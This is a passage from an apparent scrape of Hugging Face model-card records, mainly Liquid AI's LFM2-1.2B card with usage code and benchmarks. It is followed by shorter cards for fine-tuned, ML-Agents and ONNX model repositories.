<path d="M46.3596 28.4615C44.1545 28.4615 42.4109 27.8974 41.1288 26.7692C39.8724 25.6154 39.2442 24.0513 39.2442 22.0769C39.2442 20.0769 39.9109 18.5128 41.2442 17.3846C42.6032 16.2308 44.4622 15.6538 46.8211 15.6538H52.7058V13.6923C52.7058 12.5385 52.3468 11.641 51.6288 11C50.9109 10.359 49.8981 10.0385 48.5904 10.0385C47.4365 10.0385 46.475 10.2949 45.7058 10.8077C44.9365 11.2949 44.4878 11.9487 44.3596 12.7692H40.2827C40.5135 10.8718 41.3852 9.35897 42.8981 8.23077C44.4365 7.10256 46.3724 6.53846 48.7058 6.53846C51.2186 6.53846 53.2058 7.17949 54.6673 8.46154C56.1288 9.71795 56.8596 11.4359 56.8596 13.6154V28.0769H52.8211V24.1923H52.1288L52.8211 23.4231C52.8211 24.9615 52.2314 26.1923 51.0519 27.1154C49.8724 28.0128 48.3083 28.4615 46.3596 28.4615ZM47.5904 25.2692C49.0776 25.2692 50.2955 24.8974 51.2442 24.1538C52.2186 23.3846 52.7058 22.4103 52.7058 21.2308V18.4615H46.8981C45.8211 18.4615 44.9622 18.7564 44.3211 19.3462C43.7058 19.9359 43.3981 20.7436 43.3981 21.7692C43.3981 22.8462 43.7699 23.7051 44.5135 24.3462C45.257 24.9615 46.2827 25.2692 47.5904 25.2692Z"/>
<path d="M58.9984 35V6.92308H63.1138V10.9615H63.9984L63.1138 11.9231C63.1138 10.2564 63.6266 8.94872 64.6523 8C65.7036 7.02564 67.101 6.53846 68.8446 6.53846C70.9728 6.53846 72.6651 7.25641 73.9215 8.69231C75.2036 10.1026 75.8446 12.0385 75.8446 14.5V20.4615C75.8446 22.1026 75.5497 23.5256 74.96 24.7308C74.3959 25.9103 73.5882 26.8333 72.5369 27.5C71.5113 28.141 70.2805 28.4615 68.8446 28.4615C67.1266 28.4615 65.742 27.9872 64.6907 27.0385C63.6395 26.0641 63.1138 24.7436 63.1138 23.0769L63.9984 24.0385H63.0369L63.1523 28.9615V35H58.9984ZM67.4215 24.8462C68.7805 24.8462 69.8318 24.4615 70.5754 23.6923C71.3446 22.8974 71.7292 21.7564 71.7292 20.2692V14.7308C71.7292 13.2436 71.3446 12.1154 70.5754 11.3462C69.8318 10.5513 68.7805 10.1538 67.4215 10.1538C66.1138 10.1538 65.0754 10.5641 64.3061 11.3846C63.5369 12.1795 63.1523 13.2949 63.1523 14.7308V20.2692C63.1523 21.7051 63.5369 22.8333 64.3061 23.6538C65.0754 24.4487 66.1138 24.8462 67.4215 24.8462Z"/>
</g>
<linearGradient id="y" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#000000"></stop>
</linearGradient>
</svg>
</a>
</div>
</center>
# LFM2-1.2B
LFM2 is a new generation of hybrid models developed by [Liquid AI](https://www.liquid.ai/), specifically designed for edge AI and on-device deployment. It sets a new standard in terms of quality, speed, and memory efficiency.
We're releasing the weights of four post-trained checkpoints with 350M, 700M, 1.2B, and 2.6B parameters. They provide the following key features to create AI-powered edge applications:
* **Fast training & inference** – LFM2 achieves 3x faster training compared to its previous generation. It also benefits from 2x faster decode and prefill speed on CPU compared to Qwen3.
* **Best performance** – LFM2 outperforms similarly-sized models across multiple benchmark categories, including knowledge, mathematics, instruction following, and multilingual capabilities.
* **New architecture** – LFM2 is a new hybrid Liquid model with multiplicative gates and short convolutions.
* **Flexible deployment** – LFM2 runs efficiently on CPU, GPU, and NPU hardware for flexible deployment on smartphones, laptops, or vehicles.
Find more information about LFM2 in our [blog post](https://www.liquid.ai/blog/liquid-foundation-models-v2-our-second-series-of-generative-ai-models).
## 📄 Model details
Due to their small size, **we recommend fine-tuning LFM2 models on narrow use cases** to maximize performance.
They are particularly suited for agentic tasks, data extraction, RAG, creative writing, and multi-turn conversations.
However, we do not recommend using them for tasks that are knowledge-intensive or require programming skills.
| Property | [**LFM2-350M**](https://huggingface.co/LiquidAI/LFM2-350M) | [**LFM2-700M**](https://huggingface.co/LiquidAI/LFM2-700M) | [**LFM2-1.2B**](https://huggingface.co/LiquidAI/LFM2-1.2B) | [**LFM2-2.6B**](https://huggingface.co/LiquidAI/LFM2-2.6B) |
| ------------------- | ----------------------------- | ----------------------------- | ----------------------------- | ----------------------------- |
| **Parameters** | 354,483,968 | 742,489,344 | 1,170,340,608 | 2,569,272,320 |
| **Layers** | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 16 (10 conv + 6 attn) | 30 (22 conv + 8 attn) |
| **Context length** | 32,768 tokens | 32,768 tokens | 32,768 tokens | 32,768 tokens |
| **Vocabulary size** | 65,536 | 65,536 | 65,536 | 65,536 |
| **Precision** | bfloat16 | bfloat16 | bfloat16 | bfloat16 |
| **Training budget** | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens | 10 trillion tokens |
| **License** | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 | LFM Open License v1.0 |
**Supported languages**: English, Arabic, Chinese, French, German, Japanese, Korean, and Spanish.
**Generation parameters**: We recommend the following parameters:
* `temperature=0.3`
* `min_p=0.15`
* `repetition_penalty=1.05`
**Chat template**: LFM2 uses a ChatML-like chat template as follows:
```
<|startoftext|><|im_start|>system
You are a helpful assistant trained by Liquid AI.<|im_end|>
<|im_start|>user
What is C. elegans?<|im_end|>
<|im_start|>assistant
It's a tiny nematode that lives in temperate soil environments.<|im_end|>
```
You can automatically apply it using the dedicated [`.apply_chat_template()`](https://huggingface.co/docs/transformers/en/chat_templating#applychattemplate) function from Hugging Face transformers.
**Tool use**: It consists of four main steps:
1. **Function definition**: LFM2 takes JSON function definitions as input (JSON objects between `<|tool_list_start|>` and `<|tool_list_end|>` special tokens), usually in the system prompt.
2. **Function call**: LFM2 writes Pythonic function calls (a Python list between `<|tool_call_start|>` and `<|tool_call_end|>` special tokens), as the assistant answer.
3. **Function execution**: The function call is executed and the result is returned (string between `<|tool_response_start|>` and `<|tool_response_end|>` special tokens), as a "tool" role.
4. **Final answer**: LFM2 interprets the outcome of the function call to address the original user prompt in plain text.
Here is a simple example of a conversation using tool use:
```
<|startoftext|><|im_start|>system
List of tools: <|tool_list_start|>[{"name": "get_candidate_status", "description": "Retrieves the current status of a candidate in the recruitment process", "parameters": {"type": "object", "properties": {"candidate_id": {"type": "string", "description": "Unique identifier for the candidate"}}, "required": ["candidate_id"]}}]<|tool_list_end|><|im_end|>
<|im_start|>user
What is the current status of candidate ID 12345?<|im_end|>
<|im_start|>assistant
<|tool_call_start|>[get_candidate_status(candidate_id="12345")]<|tool_call_end|>Checking the current status of candidate ID 12345.<|im_end|>
<|im_start|>tool
<|tool_response_start|>{"candidate_id": "12345", "status": "Interview Scheduled", "position": "Clinical Research Associate", "date": "2023-11-20"}<|tool_response_end|><|im_end|>
<|im_start|>assistant
The candidate with ID 12345 is currently in the "Interview Scheduled" stage for the position of Clinical Research Associate, with an interview date set for 2023-11-20.<|im_end|>
```
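On the output side, here is a minimal post-processing sketch for pulling the Pythonic call out of the decoded assistant text (the regex split on the special tokens is an assumption about how you might handle the raw string, not an official parser):

```python
import re

decoded = '<|tool_call_start|>[get_candidate_status(candidate_id="12345")]<|tool_call_end|>Checking the status.'

# Extract the Python-style call list between the tool-call special tokens.
match = re.search(r"<\|tool_call_start\|>(.*?)<\|tool_call_end\|>", decoded, re.DOTALL)
if match:
    calls = match.group(1)  # '[get_candidate_status(candidate_id="12345")]'
    print(calls)
```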
**Architecture**: Hybrid model with multiplicative gates and short convolutions: 10 double-gated short-range LIV convolution blocks and 6 grouped query attention (GQA) blocks.
**Pre-training mixture**: Approximately 75% English, 20% multilingual, and 5% code data sourced from the web and licensed materials.
**Training approach**:
* Knowledge distillation using [LFM1-7B](https://www.liquid.ai/blog/introducing-lfm-7b-setting-new-standards-for-efficient-language-models) as teacher model
* Very large-scale SFT on 50% downstream tasks, 50% general domains
* Custom DPO with length normalization and semi-online datasets
* Iterative model merging
## 🏃 How to run LFM2
### 1. Transformers
To run LFM2, you need to install Hugging Face [`transformers`](https://github.com/huggingface/transformers) v4.55 or a more recent version as follows:
```bash
pip install -U transformers
```
Here is an example of how to generate an answer with transformers in Python:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
# Load model and tokenizer
model_id = "LiquidAI/LFM2-1.2B"
model = AutoModelForCausalLM.from_pretrained(
model_id,
device_map="auto",
torch_dtype="bfloat16",
# attn_implementation="flash_attention_2" <- uncomment on compatible GPU
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
# Generate answer
prompt = "What is C. elegans?"
input_ids = tokenizer.apply_chat_template(
[{"role": "user", "content": prompt}],
add_generation_prompt=True,
return_tensors="pt",
tokenize=True,
).to(model.device)
output = model.generate(
input_ids,
do_sample=True,
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05,
max_new_tokens=512,
)
print(tokenizer.decode(output[0], skip_special_tokens=False))
# <|startoftext|><|im_start|>user
# What is C. elegans?<|im_end|>
# <|im_start|>assistant
# C. elegans, also known as Caenorhabditis elegans, is a small, free-living
# nematode worm (roundworm) that belongs to the phylum Nematoda.
```
You can directly run and test the model with this [Colab notebook](https://colab.research.google.com/drive/1_q3jQ6LtyiuPzFZv7Vw8xSfPU5FwkKZY?usp=sharing).
### 2. vLLM
You need to install [`vLLM`](https://github.com/vllm-project/vllm) v0.10.2 or a more recent version as follows:
```bash
uv pip install vllm==0.10.2 --extra-index-url https://wheels.vllm.ai/0.10.2/ --torch-backend=auto
```
Here is an example of how to use it for inference:
```python
from vllm import LLM, SamplingParams
prompts = [
"What is C. elegans?",
"Say hi in JSON format",
"Define AI in Spanish"
]
sampling_params = SamplingParams(
temperature=0.3,
min_p=0.15,
repetition_penalty=1.05
)
llm = LLM(model="LiquidAI/LFM2-1.2B")
outputs = llm.generate(prompts, sampling_params)
for output in outputs:
prompt = output.prompt
generated_text = output.outputs[0].text
print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")
```
### 3. llama.cpp
You can run LFM2 with llama.cpp using its [GGUF checkpoint](https://huggingface.co/LiquidAI/LFM2-1.2B-GGUF). Find more information in the model card.
## 🔧 How to fine-tune LFM2
We recommend fine-tuning LFM2 models on your use cases to maximize performance.
| Notebook | Description | Link |
|-------|------|------|
| SFT (Unsloth) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Unsloth. | <a href="https://colab.research.google.com/drive/1HROdGaPFt1tATniBcos11-doVaH7kOI3?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (Axolotl) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using Axolotl. | <a href="https://colab.research.google.com/drive/155lr5-uYsOJmZfO6_QZPjbs8hA_v8S7t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| SFT (TRL) | Supervised Fine-Tuning (SFT) notebook with a LoRA adapter using TRL. | <a href="https://colab.research.google.com/drive/1j5Hk_SyBb2soUsuhU0eIEA9GwLNRnElF?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
| DPO (TRL) | Preference alignment with Direct Preference Optimization (DPO) using TRL. | <a href="https://colab.research.google.com/drive/1MQdsPxFHeZweGsNx4RH7Ia8lG8PiGE1t?usp=sharing"><img src="https://cdn-uploads.huggingface.co/production/uploads/61b8e2ba285851687028d395/vlOyMEjwHa_b_LXysEu2E.png" width="110" alt="Colab link"></a> |
## 📈 Performance
LFM2 outperforms similar-sized models across different evaluation categories.
### 1. Automated benchmarks

| Model | MMLU | GPQA | IFEval | IFBench | GSM8K | MGSM | MMMLU |
|-------|------|------|--------|---------|-------|------|-------|
| LFM2-350M | 43.43 | 27.46 | 65.12 | 16.41 | 30.1 | 29.52 | 37.99 |
| LFM2-700M | 49.9 | 28.48 | 72.23 | 20.56 | 46.4 | 45.36 | 43.28 |
| LFM2-1.2B | *55.23* | **31.47** | **74.89** | *20.7* | *58.3* | *55.04* | **46.73** |
| Qwen3-0.6B | 44.93 | 22.14 | 64.24 | 19.75 | 36.47 | 41.28 | 30.84 |
| Qwen3-1.7B | **59.11** | 27.72 | *73.98* | **21.27** | 51.4 | **66.56** | *46.51* |
| Llama-3.2-1B-Instruct | 46.6 | *28.84* | 52.39 | 16.86 | 35.71 | 29.12 | 38.15 |
| gemma-3-1b-it | 40.08 | 21.07 | 62.9 | 17.72 | **59.59** | 43.6 | 34.43 |
### 2. LLM-as-a-Judge


### 3. Inference
#### Throughput comparison on CPU in ExecuTorch

#### Throughput comparison on CPU in Llama.cpp

## 📬 Contact
If you are interested in custom solutions with edge deployment, please contact [our sales team](https://www.liquid.ai/contact).
|
KU-AGI/OSPO-Janus-1B
|
KU-AGI
| 2025-09-23T14:48:29Z | 6 | 0 |
transformers
|
[
"transformers",
"pytorch",
"multi_modality",
"en",
"arxiv:2506.02015",
"base_model:deepseek-ai/Janus-1.3B",
"base_model:finetune:deepseek-ai/Janus-1.3B",
"license:mit",
"endpoints_compatible",
"region:us"
] | null | 2025-09-19T01:41:26Z |
---
library_name: transformers
license: mit
language:
- en
base_model:
- deepseek-ai/Janus-1.3B
---
# Model Card
Official model checkpoint for **"OSPO: Object-centric Self-improving Preference Optimization for Text-to-Image Generation"**.
- Paper: [Arxiv](https://arxiv.org/abs/2506.02015)
- Code: [Github](https://github.com/KU-AGI/OSPO)
|
galuis116/7cc89945-bb68-4cf0-a50b-d3a2b05df69c
|
galuis116
| 2025-09-23T14:47:31Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"llama",
"axolotl",
"generated_from_trainer",
"base_model:JackFram/llama-68m",
"base_model:adapter:JackFram/llama-68m",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:44:27Z |
---
library_name: peft
license: apache-2.0
base_model: JackFram/llama-68m
tags:
- axolotl
- generated_from_trainer
model-index:
- name: 7cc89945-bb68-4cf0-a50b-d3a2b05df69c
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
adapter: lora
base_model: JackFram/llama-68m
bf16: auto
chat_template: llama3
dataset_prepared_path: null
datasets:
- data_files:
- a3b62b21faf77258_train_data.json
ds_type: json
format: custom
path: /workspace/input_data/
type:
field_input: input
field_instruction: instruction
field_output: output
field_system: system
format: '{instruction} {input}'
no_input_format: '{instruction}'
system_format: '{system}'
system_prompt: ''
debug: null
deepspeed: null
early_stopping_patience: null
eval_max_new_tokens: 128
eval_table_size: null
evals_per_epoch: 4
flash_attention: false
fp16: null
fsdp: null
fsdp_config: null
gradient_accumulation_steps: 4
gradient_checkpointing: false
group_by_length: false
hub_model_id: galuis116/7cc89945-bb68-4cf0-a50b-d3a2b05df69c
learning_rate: 0.0002
load_in_4bit: false
load_in_8bit: false
local_rank: null
logging_steps: 1
lora_alpha: 16
lora_dropout: 0.05
lora_fan_in_fan_out: null
lora_model_dir: null
lora_r: 8
lora_target_linear: true
lr_scheduler: cosine
max_steps: 10
micro_batch_size: 2
mlflow_experiment_name: /tmp/a3b62b21faf77258_train_data.json
model_type: AutoModelForCausalLM
num_epochs: 1
optimizer: adamw_bnb_8bit
output_dir: /root/.cache/huggingface/hub/trained_repo
pad_to_sequence_len: true
resume_from_checkpoint: null
s2_attention: null
sample_packing: false
saves_per_epoch: 4
sequence_len: 512
special_tokens:
pad_token: </s>
strict: false
tf32: false
tokenizer_type: AutoTokenizer
train_on_inputs: false
trust_remote_code: true
val_set_size: 0.05
wandb_entity: null
wandb_mode: offline
wandb_name: cbbcd038-7a17-4c49-a285-8321f9194ce5
wandb_project: Gradients-On-Demand
wandb_run: your_name
wandb_runid: cbbcd038-7a17-4c49-a285-8321f9194ce5
warmup_steps: 10
weight_decay: 0.0
xformers_attention: null
```
</details><br>
# 7cc89945-bb68-4cf0-a50b-d3a2b05df69c
This model is a fine-tuned version of [JackFram/llama-68m](https://huggingface.co/JackFram/llama-68m) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.1210
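A minimal usage sketch: load the base model and attach this LoRA adapter with PEFT (repo ids are taken from this card; the prompt and generation settings are illustrative):

```python
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base = AutoModelForCausalLM.from_pretrained("JackFram/llama-68m")
model = PeftModel.from_pretrained(base, "galuis116/7cc89945-bb68-4cf0-a50b-d3a2b05df69c")
tokenizer = AutoTokenizer.from_pretrained("JackFram/llama-68m")

inputs = tokenizer("Hello, world!", return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=32)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```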
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: AdamW (8-bit, bitsandbytes) with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 10
- training_steps: 10
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 2.6477 | 0.0003 | 1 | 3.1443 |
| 2.9189 | 0.0009 | 3 | 3.1439 |
| 2.7182 | 0.0019 | 6 | 3.1381 |
| 3.1061 | 0.0028 | 9 | 3.1210 |
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.0
- Pytorch 2.5.0+cu124
- Datasets 3.0.1
- Tokenizers 0.20.1
|
alpcaferoglu/Qwen2.5-Coder-3B-Instruct_bd_cs_t2sws-t2s_r64_a64_e1_bs2_gas4_lr7.5e-05_fs0f_cvdt_sftreason
|
alpcaferoglu
| 2025-09-23T14:46:06Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"unsloth",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T02:12:23Z |
---
library_name: transformers
tags:
- unsloth
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
echarlaix/tiny-random-gpt-oss-mxfp4
|
echarlaix
| 2025-09-23T14:45:28Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gpt_oss",
"text-generation",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"mxfp4",
"region:us"
] |
text-generation
| 2025-09-23T14:38:11Z |
---
license: apache-2.0
pipeline_tag: text-generation
library_name: transformers
---
|
johngreendr1/bfe3b72f-08eb-4ad4-a14d-1acb287819b7
|
johngreendr1
| 2025-09-23T14:44:37Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:jingyeom/seal3.1.6n_7b",
"base_model:adapter:jingyeom/seal3.1.6n_7b",
"region:us"
] | null | 2025-09-23T14:44:30Z |
---
base_model: jingyeom/seal3.1.6n_7b
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.1
|
OxoGhost/poca-SoccerTwos
|
OxoGhost
| 2025-09-23T14:44:33Z | 0 | 0 |
ml-agents
|
[
"ml-agents",
"tensorboard",
"onnx",
"SoccerTwos",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SoccerTwos",
"region:us"
] |
reinforcement-learning
| 2025-09-23T14:44:27Z |
---
library_name: ml-agents
tags:
- SoccerTwos
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SoccerTwos
---
# **poca** Agent playing **SoccerTwos**
This is a trained model of a **poca** agent playing **SoccerTwos**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how ML-Agents works:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**:

1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Find your model_id: OxoGhost/poca-SoccerTwos
3. Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
onnxmodelzoo/resnext50d_32x4d_Opset17
|
onnxmodelzoo
| 2025-09-23T14:43:58Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:50Z |
---
language: en
license: apache-2.0
model_name: resnext50d_32x4d_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext26ts_Opset18
|
onnxmodelzoo
| 2025-09-23T14:43:14Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:43:08Z |
---
language: en
license: apache-2.0
model_name: resnext26ts_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext26ts_Opset16
|
onnxmodelzoo
| 2025-09-23T14:43:02Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:42:56Z |
---
language: en
license: apache-2.0
model_name: resnext26ts_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnext101_32x8d_Opset18
|
onnxmodelzoo
| 2025-09-23T14:42:56Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:42:38Z |
---
language: en
license: apache-2.0
model_name: resnext101_32x8d_Opset18.onnx
tags:
- Computer_Vision
---
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-0.01-mnt64-0922195521-epoch-8
|
vectorzhou
| 2025-09-23T14:42:54Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
